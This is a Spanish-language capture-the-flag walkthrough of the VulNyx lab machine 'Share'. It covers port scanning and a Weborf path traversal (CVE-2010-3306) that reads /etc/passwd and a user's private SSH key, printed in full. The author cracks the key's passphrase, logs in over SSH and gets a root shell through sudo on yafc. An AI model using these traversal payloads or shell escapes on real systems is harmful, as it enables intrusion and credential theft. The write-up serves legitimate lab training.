VulNyx - Share
Information
Share es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 08:00 CEST
Nmap scan report for 192.168.1.81
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,8080 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 08:00 CEST
Nmap scan report for 192.168.1.81
Host is up (0.00086s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
8080/tcp open http-proxy Weborf (GNU/Linux)
| http-webdav-scan:
| Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| WebDAV type: Apache DAV
|_ Server Type: Weborf (GNU/Linux)
|_http-server-header: Weborf (GNU/Linux)
| http-methods:
|_ Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 960
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-apache2.service-fyx7mg/">systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-apache2.service-fyx7mg/</a></td><td>-</td></tr>
| style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-systemd-logind.service-PtbMjf/">systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-systemd-logind.service-PtbMjf/</a></td><td>-</td></tr>
| style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-systemd-timesyncd.service-y5DQmg/">systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-
| HTTPOptions, RTSPRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|_http-title: Weborf
Shell (tim)
80/TCP (HTTP)
Site
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.81/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Weborf
Enumero un servidor para compartir archivos Weborf de versión 0.12.2
Encuentro un exploit con la vulnerabiliad CVE-2010-3306 de tipo Path Traversal y el PoC es el siguiente:
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
CVE-2010-3306
Consigo leer el archivo /etc/passwd y enumerar a los usuarios tim y root
❯ curl -sX GET "http://192.168.1.81:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" |grep "sh$"
root:x:0:0:root:/root:/bin/bash
tim:x:1000:1000:tim:/home/tim:/bin/bash
En el home del usuario tim encuentro su clave privada id_rsa
❯ curl -sX GET "http://192.168.1.81:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2ftim%2f.ssh%2fid_rsa" |tee id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,18A95149B088CB78
aBu3NjmcUfADWuzFpwWxasSBX4cxz/+CcEEHscqmZeN5ywjwFXYFcZd6TCf0lezw
faOYDAQP2e/OkND5DGhuhSIt/sWgO4k9eSgMmtqwkiHH4CCtAZ7/JLgFQaTtvQMB
XjoUOZBBI/nxlvr1GXT62uvADBDBuba7DAwBmiANq94C5znPLXPgHw5lNzFgdwZj
Aj2W0e2I/dKMcHtvABX1zc+UTUjyR1fslZYgOWD3oA9DANEX2jnmxJi2pwTdAi7p
X80LhLLhBY5MbGwE0Ssi0//84aoWXpEOL1xMB8GClhpEYyMncE7Vk3hizKeY94SE
JmslraQd8vwI8asZ/NKAuIv1qN2wXBVxKBcT4ybcAtTKUQCfCtOk8CLerR4DeHIc
J8hCU31yyZly6LBbfXaFIxsNj+nb1bkHf45vWjEgaTlr8TxNqUivI+sl4MOecNJd
je/4d90mai5vNkHQlE1MwjwZ33WHNeCA2OnNAMjfjgqqwUCI3rLxryv0nwT3BvBM
swJ4OVp0JA9gMfPav0H36gEyzQuoJgltdHVKWnv7mTwVVfjEe97TPWxsWIRfcqeR
Gx8S7+/hoqGL7NKSOVecjHbmtnJYJfpX3lJ42kWQ+bNVxPAHYQC9LMtJBSbCoDvE
zqlodfF8uybFspdYuDtwkBZdZg1P7Xqn9VBdAy8hzY5LaMfTbKMvbvbBj7+I+/3Y
267NTNsxOickCifcD/2BWogvIMXYou18Sjks6jW7XgYeYJj0Z6jj7FmaT3kA3aox
C1u+qemIRa+qVE4aYUt1EyWN7/gPpfmrxnqR6/g1LiMi8AaIiCVCd59LN3a82nQ+
jbg7e0/DIRER383n5Ky2jHNvj5h6aqs5usxpKv2pWid93WNShqlJs0nFZ96khtFf
gd7eE9BDX2QhB6GpOZpPUwEJLh/laDlld1DFBxRDCdlXGwJnIVc/9v6l03HpHwDY
IlwY2TTbFApmXMDD6geVmc/jEjhtaHqxJV6W0tAenFJpaPqRxxz5g4KHNAd2ynnc
LDbZCgXl2QNkonhJn7ABc1tjAU5JAFaQskVw751+JjZyUyPbGWDrVAPisuS9krNx
ZGjlviNY0meJYq11JWLfimt8zWnKKQ7f9TwSr5bTsctz94xw9imK3pQifvuXJBDn
xAXb/CAJj8HfMlxD8cXaQ174RntE8/cNeG+oonqmkCajZ5STPiTzVURcmEDNSSNR
DboKfz2St/qzoXtJjNiryQ6tsuGhzJjtJKQ3TX0FbOUwc6uHi31kLOsviKLLnTIt
NOHFzUV2Z/jcELP5bnEuVABCqUAUeHYoa0fxjr3pDA8M7vMrT7acwU4qzl+RVMw3
3Oqeqz8JslhJnhLWmgbhyqKnpeXHuS4EkowR/LgrfO8q3GcA1HM9/NRYBrdqwXhA
FfgQAPgaTrwwUykqjq0nYFaQIy7U0LyZ5dJTnTDGGc69X888yC/h0s78ANW9qdzp
k8awm1OE0sggJcmj6PV2vCJeGasYWNY5cE0ORyj4yp76DhkCzTQPG2R5NTe4WFmB
tgnHhIzocSa04QPldHxgwBPLTAG+wXRLCSsBRIXYlmqm4+gIXldVrWxu/rEAmZ8a
-----END RSA PRIVATE KEY-----
22/TCP (SSH)
Cracking (id_rsa)
Con RSAcrack obtengo el passphrase ilovetim
❯ RSAcrack -w /opt/techyou.txt -k id_rsa
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: d4t4s3c ver: v1.0.0
─────────────────────────────
[i] Cracking | id_rsa
[i] Wordlist | /opt/techyou.txt
[*] Status | 5280/10000/52%/ilovetim
[+] Password | ilovetim
─────────────────────────────
Accedo al sistema como usuario tim
❯ ssh -i id_rsa tim@192.168.1.81
Enter passphrase for key 'id_rsa':
tim@share:~$ id ; hostname
uid=1000(tim) gid=1000(tim) grupos=1000(tim)
share
Privilege Escalation
Enumeration
Sudo
El usuario tim puede ejecutar como root el binario yafc con sudo
tim@share:~$ sudo -l
Matching Defaults entries for tim on share:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tim may run the following commands on share:
(root) NOPASSWD: /usr/bin/yafc
Abuse
Revisando el help de yafc con ! permite ejecutar comandos externos
tim@share:~$ yafc
yafc 1.3.7
This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'.
This is free software; type 'copyright' for details.
yafc> help
Available commands: (commands may be abbreviated)
!
Me convierto en usuario root abusando del privilegio
tim@share:/$ sudo -u root /usr/bin/yafc
yafc 1.3.7
This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'.
This is free software; type 'copyright' for details.
yafc> !/bin/bash
root@share:/# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
share
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@share:/# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
9afc****************************
721e****************************
Hasta aquí la resolución de la máquina Share.
Happy Hacking!